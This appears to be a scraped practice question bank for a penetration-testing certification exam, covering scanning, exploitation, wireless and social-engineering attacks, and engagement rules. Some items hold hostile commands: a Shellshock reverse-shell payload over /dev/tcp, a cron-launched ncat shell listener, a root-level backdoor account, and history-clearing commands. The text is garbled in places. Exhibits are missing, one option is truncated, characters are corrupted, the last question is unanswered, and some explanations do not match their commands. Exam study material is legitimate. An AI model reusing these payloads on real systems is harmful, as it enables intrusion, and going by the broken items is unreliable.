Practice


A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50. Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? A. A firewall or IPS blocked the scan. B. The penetration tester used unsupported flags. C. The edge network device was disconnected. D. The scan returned ICMP echo replies.

A. A firewall or IPS blocked the scan.

Which of the following assessment methods is MOST likely to cause harm to an ICS environment? A. Active scanning B. Ping sweep C. Protocol reversing D. Packet analysis

A. Active scanning

Which of the following situations would MOST likely warrant revalidation of a previous security assessment? A. After detection of a breach B. After a merger or an acquisition C. When an organization updates its network firewall configurations D. When most of the vulnerabilities have been remediated

A. After detection of a breach

A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve? A. Determine active hosts on the network. B. Set the TTL of ping packets for stealth. C. Fill the ARP table of the networked devices. D. Scan the system on the most used ports.

A. Determine active hosts on the network.

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment? A. Exploiting a configuration weakness in the SQL database B. Intercepting outbound TLS traffic C. Gaining access to hosts by injecting malware into the enterprise-wide update server D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates E. Establishing and maintaining persistence on the domain controller

A. Exploiting a configuration weakness in the SQL database

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT? A. John the Ripper B. Hydra C. Mimikatz D. Cain and Abel

A. John the Ripper

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? A. OpenVAS B. Drozer C. Burp Suite D. OWASP ZAP

A. OpenVAS

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT? A. Reach out to the primary point of contact. B. Try to take down the attackers. C. Call law enforcement officials immediately. D. Collect the proper evidence and add to the final report.

A. Reach out to the primary point of contact.

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2

A. S/MIME

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? A. SQLmap B. Nessus C. Nikto D. DirBuster

A. SQLmap The id parameter in this URL is a likely SQL injection point.

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT? A. Send deauthentication frames to the stations. B. Perform jamming on all 2.4GHz and 5GHz channels. C. Set the malicious AP to broadcast within dynamic frequency selection channels. D. Modify the malicious AP configuration to not use a preshared key.

A. Send deauthentication frames to the stations.

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance? A. Shodan B. Nmap C. WebScarab-NG D. Nessus

A. Shodan

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) A. Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP cache

A. Spawned shells B. Created user accounts

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report? A. Stronger algorithmic requirements B. Access controls on the server C. Encryption on the user passwords D. A patch management program

A. Stronger algorithmic requirements

Which of the following BEST describe the OWASP Top 10? (Choose two.) A. The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F. A checklist of Apache vulnerabilities

A. The most critical risks of web applications C. The risks defined in order of importance

After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results: The tester then runs the following command from the previously exploited system, which fails: Which of the following explains the reason why the command failed? A. The tester input the incorrect IP address. B. The command requires the --port 135 option. C. An account for RDP does not exist on the server. D. PowerShell requires administrative privilege.

A. The tester input the incorrect IP address.

A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework? A. Understanding the tactics of a security intrusion can help disrupt them. B. Scripts that are part of the framework can be imported directly into SIEM tools. C. The methodology can be used to estimate the cost of an incident better. D. The framework is static and ensures stability of a security program over time.

A. Understanding the tactics of a security intrusion can help disrupt them.

A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router. Which of the following is MOST vulnerable to a brute-force attack? A. WPS B. WPA2-EAP C. WPA-TKIP D. WPA2-PSK

A. WPS

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers? A. Web archive B. GitHub C. File metadata D. Underground forums

A. Web archive

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk? A. Whether sensitive client data is publicly accessible B. Whether the connection between the cloud and the client is secure C. Whether the client's employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC

A. Whether sensitive client data is publicly accessible

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? A. Whether the cloud service provider allows the penetration tester to test the environment B. Whether the specific cloud services are being used by the application C. The geographical location where the cloud services are running D. Whether the country where the cloud service is based has any impeding laws

A. Whether the cloud service provider allows the penetration tester to test the environment

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.) A. Wireshark B. Nessus C. Retina D. Burp Suite E. Shodan F. Nikto

A. Wireshark E. Shodan Wireshark is considered a passive reconnaissance tool because it only captures and analyzes network traffic without actively probing or exploiting targets. Shodan is a search engine that specializes in finding Internet-connected devices; it is considered passive because it only returns information that is already publicly indexed, without the tester sending traffic to the target.

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? A. chmod u+x script.sh B. chmod u+e script.sh C. chmod o+e script.sh D. chmod o+x script.sh

A. chmod u+x script.sh The chmod command is used to change the permissions of a file. In this case, the option u+x is used to grant execution permission to the file owner (u refers to the user/owner, and +x adds the execute permission).

The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} B. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/h/xhtml+xml,application/xml"} C. exploit = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} D. exploit = {"User-Agent": "() { ignored;};/bin/

A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} The code in the script creates a dictionary called exploit that holds a key-value pair for each of the User-Agent and Accept headers. The value of the User-Agent key is a Shellshock-style payload: a shell command that spawns a reverse shell and redirects its input and output to the specified IP address and port.

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? A. iam_enum_permissions B. iam_prive_sc_scan C. iam_backdoor_assume_role D. iam_bruteforce_permissions

A. iam_enum_permissions

A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan? A. nmap -sn 10.12.1.0/24 B. nmap -sV -A 10.12.1.0/24 C. nmap -Pn 10.12.1.0/24 D. nmap -sT -p- 10.12.1.0/24

A. nmap -sn 10.12.1.0/24 The -sn option performs a ping scan (host discovery only, no port scan).

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B. wmic startup get caption,command C. (crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null D. sudo useradd -ou 0 -g 0 user

A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe Windows uses schtasks; crontab is a Linux tool.

A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal? A. Wireshark B. Aircrack-ng C. Kismet D. Wifite

B. Aircrack-ng Aircrack-ng is a suite of tools used for wireless penetration testing. It includes several utilities for capturing, monitoring, and analyzing Wi-Fi networks. One of the utilities in Aircrack-ng is airbase-ng, which allows you to set up a rogue access point.

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code: Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS? A. sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds. B. *range(1, 1025) on line 1 populated the portList list in numerical order. C. Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM D. The remoteSvr variable has neither been type-hinted nor initialized.

B. *range(1, 1025) on line 1 populated the portList list in numerical order.

Which of the following would a company's hunt team be MOST interested in seeing in a final report? A. Executive summary B. Attack TTPs C. Methodology D. Scope details

B. Attack TTPs

A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link? A. Familiarity and likeness B. Authority and urgency C. Scarcity and fear D. Social proof and greed

B. Authority and urgency

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? A. Wait for the next login and perform a downgrade attack on the server. B. Capture traffic using Wireshark. C. Perform a brute-force attack over the server. D. Use an FTP exploit against the server.

B. Capture traffic using Wireshark. FTP transmits credentials in the clear (unencrypted); FTPS is the secure version. Wireshark captures the packets, and the credentials can be read in clear text.

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform? A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device.

B. Dump the user address book on the device. Bluesnarfing is a type of attack that involves unauthorized access to data on a Bluetooth-enabled device. One example is an attacker connecting to a mobile device and downloading the user's address book without permission.

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST? A. Establish the format required by the client. B. Establish the threshold of risk to escalate to the client immediately. C. Establish the method of potential false positives. D. Establish the preferred day of the week for reporting.

B. Establish the threshold of risk to escalate to the client immediately.

A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results: Based on the output, which of the following services are MOST likely to be exploited? (Choose two.) A. Telnet B. HTTP C. SMTP D. DNS E. NTP F. SNMP

B. HTTP D. DNS

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? A. Uncover potential criminal activity based on the evidence gathered. B. Identify all the vulnerabilities in the environment. C. Limit invasiveness based on scope. D. Maintain confidentiality of the findings.

B. Identify all the vulnerabilities in the environment.

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types? A. Nessus B. Metasploit C. Burp Suite D. Ethercap

B. Metasploit

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive? A. Run another scanner to compare. B. Perform a manual test on the server. C. Check the results on the scanner. D. Look for the vulnerability online.

B. Perform a manual test on the server.

A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target? A. Nessus B. ProxyChains C. OWASP ZAP D. Empire

B. ProxyChains

During an engagement, a penetration tester found the following list of strings inside a file: random letters and numbers Which of the following is the BEST technique to determine the known plaintext of the strings? A. Dictionary attack B. Rainbow table attack C. Brute-force attack D. Credential-stuffing attack

B. Rainbow table attack

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step? A. Perform a new penetration test. B. Remediate the findings. C. Provide the list of common vulnerabilities and exposures. D. Broaden the scope of the penetration test.

B. Remediate the findings.

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance? A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng

B. Shodan Shodan is a search engine for Internet-connected devices. It allows a user to search for specific types of devices or services, such as cameras, servers, or routers, connected to the Internet.

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened? A. The penetration tester was testing the wrong assets. B. The planning process failed to ensure all teams were notified. C. The client was not ready for the assessment to start. D. The penetration tester had incorrect contact information.

B. The planning process failed to ensure all teams were notified.

A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file? A. Nmap B. Wireshark C. Metasploit D. Netcat

B. Wireshark

A penetration tester obtained the following results after scanning a web server using the dirb utility: Which of the following elements is MOST likely to contain useful information for the penetration tester? A. index.html B. about C. info D. home.html

B. about In the actual question, the about entry had by far the largest size of the listed results.

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement? A. grep -v apache ~/bash_history > ~/.bash_history B. rm -rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM "apache" /F

B. rm -rf /tmp/apache This is to cover the tracks/logs after a successful break in.

A penetration tester gains access to a system and is able to migrate to a user process: Given the output above, which of the following actions is the penetration tester performing? (Choose two.) A. Redirecting output from a file to a remote system B. Building a scheduled task for execution C. Mapping a share to a remote system D. Executing a file on the remote system E. Creating a new process on all domain systems F. Setting up a reverse shell from a remote system G. Adding an additional IP address on the compromised system

C. Mapping a share to a remote system D. Executing a file on the remote system The net use command maps a share; the file is then copied and run remotely.

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement? A. Acceptance by the client and sign-off on the final report B. Scheduling of follow-up actions and retesting C. Attestation of findings and delivery of the report D. Review of the lessons during the engagement

C. Attestation of findings and delivery of the report

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing? A. Phishing B. Tailgating C. Baiting D. Shoulder surfing

C. Baiting

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify? A. Weak authentication schemes B. Credentials stored in strings C. Buffer overflows D. Non-optimized resource management

C. Buffer overflows

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid? A. PLCs will not act upon commands injected over the network. B. Supervisors and controllers are on a separate virtual network by default. C. Controllers will not validate the origin of commands. D. Supervisory systems will detect a malicious injection of code/commands.

C. Controllers will not validate the origin of commands. Many legacy industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems were not designed with security in mind and lack basic security features such as authentication and access controls. As a result, it is common for these systems to accept commands from any source without verifying their origin. This makes them vulnerable to attacks such as command injection, which can be used to disrupt or damage the systems they control.

A penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp; touch -r .bash_history temp Which of the following actions is the tester MOST likely performing? A. Redirecting Bash history to /dev/null B. Making a copy of the user's Bash history for further enumeration C. Covering tracks by clearing the Bash history D. Making decoy files on the system to confuse incident responders

C. Covering tracks by clearing the Bash history "cat /dev/null > temp" clears the contents of a file called "temp": the (empty) contents of the special file "/dev/null" are redirected into "temp", overwriting any existing data and leaving the file empty. "touch -r .bash_history temp" updates the timestamp of the file "temp" to match the timestamp of ".bash_history"; the "-r" option specifies the reference file whose timestamp is copied. "mv temp .bash_history" renames or moves "temp" to ".bash_history", so "temp" no longer exists and the existing ".bash_history" is overwritten by the empty file that carries the original history file's timestamp.

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
- Have a full TCP connection
- Send a "hello" payload
- Wait for a response
- Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective? A. Run nmap -Pn -sV --script vuln <IP address>. B. Employ an OpenVAS simple scan against the TCP port of the host. C. Create a script in the Lua language and use it with NSE. D. Perform a credentialed scan with Nessus.

C. Create a script in the Lua language and use it with NSE.

A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT? A. Halt the penetration test. B. Conduct an incident response. C. Deconflict with the penetration tester. D. Assume the alert is from the penetration test.

C. Deconflict with the penetration tester.

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited? A. Command injection B. Broken authentication C. Direct object reference D. Cross-site scripting

C. Direct object reference

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an attacker gain internal access to the affected machine? A. Edit the discovered file with one line of code for remote callback. B. Download .pl files and look for usernames and passwords. C. Edit the smb.conf file and upload it to the server. D. Download the smb.conf file and look at configurations

C. Edit the smb.conf file and upload it to the server. By editing the smb.conf file (smb is short for Server Message Block, a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers) and uploading it to the server, an attacker can modify the configurations of the SMB service and potentially gain internal access to the affected machine.

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A. Smurf B. Ping flood C. Fraggle D. Ping of death

C. Fraggle If ICMP (Internet Control Message Protocol) is disabled on a network segment, it would mean that ICMP-based attacks, like ping flood (option B) and ping of death (option D), would not be effective. ICMP is used in these attacks, and with it disabled, they wouldn't work on that segment. A Fraggle attack is similar to a Smurf attack but uses UDP (User Datagram Protocol) rather than ICMP.

The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS? A. Line 01 B. Line 02 C. Line 07 D. Line 08 E. Line 12

C. Line 07

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task? A. Run nmap with the -O, -p22, and -sC options set against the target. B. Run nmap with the -sV and -p22 options set against the target. C. Run nmap with the --script vulners option set against the target. D. Run nmap with the -sA option set against the target.

C. Run nmap with the --script vulners option set against the target.

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal? A. Metasploit B. Hydra C. SET D. WPScan

C. SET The Social-Engineer Toolkit (SET) is a way to test your employees' security awareness.

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? A. NDA B. MSA C. SOW D. MOU

C. SOW

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds? A. Nmap B. tcpdump C. Scapy D. hping3

C. Scapy Scapy is a powerful packet manipulation tool that allows users to craft, send, and receive custom TCP packets. It can be used to manipulate the TCP headers and to observe the response from the proprietary service.

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective? A. Socat B. tcpdump C. Scapy D. dig

C. Scapy Use Scapy to craft and inject malicious packets into the network, such as ARP spoofing or DNS poisoning.

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take? A. Utilize the tunnel as a means of pivoting to other internal devices. B. Disregard the IP range, as it is out of scope. C. Stop the assessment and inform the emergency contact. D. Scan the IP range for additional systems to exploit.

C. Stop the assessment and inform the emergency contact.

A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE? A. Cost of the assessment B. Report distribution C. Testing restrictions D. Liability

C. Testing restrictions

A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades-old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan? A. The timing of the scan B. The bandwidth limitations C. The inventory of assets and versions D. The type of scan

C. The inventory of assets and versions

Which of the following describes the reason why a penetration tester would run the command `sdelete mimikatz.*` on a Windows server that the tester compromised? A. To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a reverse shell from the system

C. To remove tools from the server `sdelete` is a command-line utility that securely deletes files and cleanses free space on a disk in Windows. `Mimikatz` is a well-known tool used by attackers (and penetration testers) to extract plaintext passwords, hashes, PINs, and Kerberos tickets from memory. In the context of the given command `sdelete mimikatz.*`, the intention is to securely delete all files related to Mimikatz from the compromised server.

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? A. Partially known environment testing B. Known environment testing C. Unknown environment testing D. Physical environment testing

C. Unknown environment testing

A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: http/ 1.1 wordpress Which of the following tools would be BEST for the penetration tester to use to explore this site further? A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP

C. WPScan

Appending string values onto another string is called: A. compilation B. connection C. concatenation D. conjunction

C. concatenation

A compliance-based penetration test is primarily concerned with: A. obtaining PII from the protected network. B. bypassing protection on edge devices. C. determining the efficacy of a specific set of security standards. D. obtaining specific information from the protected network.

C. determining the efficacy of a specific set of security standards.

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use for further progress into the targeted network? A. nc 10.10.1.2 B. ssh 10.10.1.2 C. nc 127.0.0.1 5555 D. ssh 127.0.0.1 5555

C. nc 127.0.0.1 5555

A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection? A. nmap -P0 -T0 -sS 192.168.1.10 B. nmap -sA -sV --host-timeout 60 192.168.1.10 C. nmap -f --badsum 192.168.1.10 D. nmap -A -n 192.168.1.10

C. nmap -f --badsum 192.168.1.10 The command "nmap -f --badsum 192.168.1.10" is most likely to avoid detection by the client's IDS. The -f option fragments the probe packets and --badsum gives them invalid checksums, which can cause some IDSs to ignore the traffic.

A penetration tester is scanning a corporate lab network for potentially vulnerable services.Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? A. nmap 192.168.1.1-5 -PU22-25,80 B. nmap 192.168.1.1-5 -PA22-25,80 C. nmap 192.168.1.1-5 -PS22-25,80 D. nmap 192.168.1.1-5 -Ss22-25,80

C. nmap 192.168.1.1-5 -PS22-25,80

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection? A. nmap -T3 192.168.0.1 B. nmap -P0 192.168.0.1 C. nmap -T0 192.168.0.1 D. nmap -A 192.168.0.1

C. nmap ג€"T0 192.168.0.1 -T0 Paranoid: Very slow, used for IDS evasion -T1 Sneaky: Quite slow, used for IDS evasion -T2 Polite: Slows down to consume less bandwidth, runs ~10 times slower than default -T3 Normal: Default, a dynamic timing model based on target responsiveness -T4 Aggressive: Assumes a fast and reliable network and may overwhelm targets -T5 Insane: Very aggressive; will likely overwhelm targets or miss open ports

Which of the following expressions in Python increase a variable val by one? (Choose two.) A. val++ B. +val C. val=(val+1) D. ++val E. val=val++ F. val+=1

C. val=(val+1) F. val+=1

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.) A. A handheld RF spectrum analyzer B. A mask and personal protective equipment C. Caution tape for marking off insecure areas D. A dedicated point of contact at the client E. The paperwork documenting the engagement F. Knowledge of the building's normal business hours

D. A dedicated point of contact at the client E. The paperwork documenting the engagement

A consultant is reviewing the following output after reports of intermittent connectivity issues:Which of the following is MOST likely to be reported by the consultant? A. A device on the network has an IP address in the wrong subnet. B. A multicast session was initiated using the wrong multicast group. C. An ARP flooding attack is using the broadcast address to perform DDoS. D. A device on the network has poisoned the ARP cache.

D. A device on the network has poisoned the ARP cache.

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe typecasting operations

D. Code context for instances of unsafe typecasting operations

A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? A. Forensically acquire the backdoor Trojan and perform attribution. B. Utilize the backdoor in support of the engagement. C. Continue the engagement and include the backdoor finding in the final report. D. Inform the customer immediately about the backdoor.

D. Inform the customer immediately about the backdoor.

A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success? A. Attempting to tailgate an employee who is going into the client's workplace B. Dropping a malicious USB key with the company's logo in the parking lot C. Using a brute-force attack against the external perimeter to gain a foothold D. Performing spear phishing against employees by posing as senior management

D. Performing spear phishing against employees by posing as senior management

A penetration tester ran the following commands on a Windows server:Which of the following should the tester do AFTER delivering the final report? A. Delete the scheduled batch job. B. Close the reverse shell connection. C. Downgrade the svsaccount permissions. D. Remove the tester-created credentials.

D. Remove the tester-created credentials.

A penetration tester writes the following script:Which of the following is the tester performing? A. Searching for service vulnerabilities B. Trying to recover a lost bind shell C. Building a reverse shell listening on specified ports D. Scanning a network for specific open ports

D. Scanning a network for specific open ports

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contract with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid? A. Crawling the web application's URLs looking for vulnerabilities B. Fingerprinting all the IP addresses of the application's servers C. Brute forcing the application's passwords D. Sending many web requests per second to test DDoS protection

D. Sending many web requests per second to test DDoS protection

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets? A. Run an application vulnerability scan and then identify the TCP ports used by the application. B. Run the application attached to a debugger and then review the application's log. C. Disassemble the binary code and then identify the break points. D. Start a packet capture with Wireshark and then run the application.

D. Start a packet capture with Wireshark and then run the application. To validate whether the Java application uses encryption over sockets, the penetration tester needs to capture and analyze network traffic using a tool like Wireshark. By capturing the traffic, the tester can inspect the packets to see if the data is being sent in plaintext or if it is encrypted. This method does not require any modification of the application itself, making it a non-intrusive approach.

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal? A. RFID cloning B. RFID tagging C. Meta tagging D. Tag nesting

D. Tag nesting

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? A. Unsupported operating systems B. Susceptibility to DDoS attacks C. Inability to network D. The existence of default passwords

D. The existence of default passwords

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement? A. The team exploits a critical server within the organization. B. The team exfiltrates PII or credit card data from the organization. C. The team loses access to the network remotely. D. The team discovers another actor on a system on the network.

D. The team discovers another actor on a system on the network.

A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output? A. The HTTP port is not open on the firewall. B. The tester did not run sudo before the command. C. The web server is using HTTPS instead of HTTP. D. This URI returned a server error.

D. This URI returned a server error. The 500 status code is a server-side error code, so the correct answer is D.

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team? A. Multiple handshakes B. IP addresses C. Encrypted file transfers D. User hashes sent over SMB

D. User hashes sent over SMB Responder is a toolkit that responds to NetBIOS name service queries for file server service requests using the Server Message Block (SMB) protocol, capturing the authentication hashes that clients send.

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? A. Perform vertical privilege escalation. B. Replay the captured traffic to the server to recreate the session. C. Use John the Ripper to crack the password. D. Utilize a pass-the-hash attack.

D. Utilize a pass-the-hash attack. A pass-the-hash attack is a method of authenticating to a server or service by using the underlying NTLM or LANMAN hash of a user's password, instead of the actual password. Replaying the captured traffic to the server to recreate the session may not work as the session may have timed out or otherwise been terminated.

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: A. security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting teams. D. business and network operations may be impacted.

D. business and network operations may be impacted.

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the: A. devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects.

D. devices may cause physical world effects.

A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? A. nmap -sT -vvv -O 192.168.1.2/24 -PO B. nmap -sV 192.168.1.2/24 -PO C. nmap -sA -v -O 192.168.1.2/24 D. nmap -sS -O 192.168.1.2/24 -T1

